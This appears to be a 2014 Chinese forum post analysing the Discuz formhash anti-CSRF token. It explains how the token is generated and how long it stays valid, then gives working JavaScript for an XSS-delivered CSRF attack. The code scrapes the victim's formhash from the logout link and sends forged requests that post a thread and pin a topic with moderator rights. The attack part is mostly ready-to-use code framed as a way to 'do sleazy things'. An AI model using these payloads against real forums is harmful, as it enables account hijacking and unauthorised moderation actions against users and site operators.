Discuz formhash 简单分析
熟悉discuz的都知道,formhash是一种类似验证码的东西,用来防止从我们网站外部提交数据,但不需要我们手动输入,它在页面打开时就已经生成了,存在一需要提交数据用到的地方的隐藏input里(比如登录、发布文章)。
其相应服务端验证代码
[AppleScript] 纯文本查看 复制代码 if (submitcheck('formhash')) {
我们来看这货的生成算法
[AppleScript] 纯文本查看 复制代码 substr(md5(substr($_G['timestamp'], 0, -7).$_G['username'].$_G['uid'].$_G['authkey'].$hashadd.$specialadd), 8, 8);
时间戳前3位,大概是 100多天的样子,也就是说这货对于同一人来说 100 天内是不变的.
获取 formhash
当我们进行csrf操作时,首先得获取目标的 formhash,例如用户这里的提醒xss
<code>
[AppleScript] 纯文本查看 复制代码 var hash;
function getHash(){
for(var i=0; i<document.links.length; i++)
{
if(document.links[i].href.indexOf("action=logout&formhash=")>0)
{
hash=document.links[i].href;
hash=hash.substr(hash.length-8,hash.length);
break;
} } }
Csrf 代码编写
得到了formhash就简单了 只要抓取各种 post包即可做各种猥琐事情了 ,这里笔者用了个
兼容的ajax库(截取自jquery中的 ajax代码)
[AppleScript] 纯文本查看 复制代码 x = window.x || {
request: function() {
if (window.XMLHttpRequest) {
var ajax = new XMLHttpRequest()
} else if (window.ActiveXObject) {
try {
var ajax = new ActiveXObject("Msxml2.XMLHTTP")
} catch(e) {
try {
var ajax = new ActiveXObject("Microsoft.XMLHTTP")
} catch(e) {}
}
}
return ajax
},
handle: function(ajax, callback) {
ajax.onreadystatechange = function() {
if (ajax.readyState == 4) {
if (ajax.status == 200) {
callback(ajax.responseText)
}
}
}
},
display:function(o){
if(typeof(o)=='object'){
var str='';
for(a in o){
str+=a+'='+o[a]+'&';
}
str=str.substr(0,str.length-1);
return str;
}else{
return o;
}
},
get: function(url, callback) {
ajax = x.request();
ajax.open('get', url, true);
ajax.send(null);
x.handle(ajax, callback)
},
post: function(url, content, callback) {
ajax = x.request();
ajax.open('post', url, true);
ajax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
content=x.display(content);
ajax.send(content);
x.handle(ajax, callback)
},
}
发帖操作
[AppleScript] 纯文本查看 复制代码 x.post("forum.php?mod=post&action=newthread&fid=2&extra=&topicsubmit=yes","formhash="+hash+"&posttime=1353989838&wysiwyg=1&subject=title&message=aaaaaaaaaaaaaaaa%0D%0A&replycredit_extcredits=0&replycredit_times=1&replycredit_membertimes=1&replycredit_random=100&readperm=&price=&tags=test&rushreplyfrom=&rushreplyto=&rewardfloor=&stopfloor=&creditlimit=&save=&adddynamic=true&usesig=1&allownoticeauthor=1");
置顶帖子
[AppleScript] 纯文本查看 复制代码 x.post("forum.php?mod=topicadmin&action=moderate&optgroup=1&modsubmit=yes&infloat=yes&inajax=1","frommodcp=&formhash="+hash+"&fid=2&redirect=&listextra=page%3D1&handlekey=mods&moderate[]=12&operations[]=stick&sticklevel=3&expirationstick=&digestlevel=0&expirationdigest=&highlight_color=0&highlight_style[1]=0&highlight_style[2]=0&highlight_style[3]=0&expirationhighlight=&reason="); | 
发表于 2014-7-20 08:13:21
发表于 2014-7-20 19:54:56
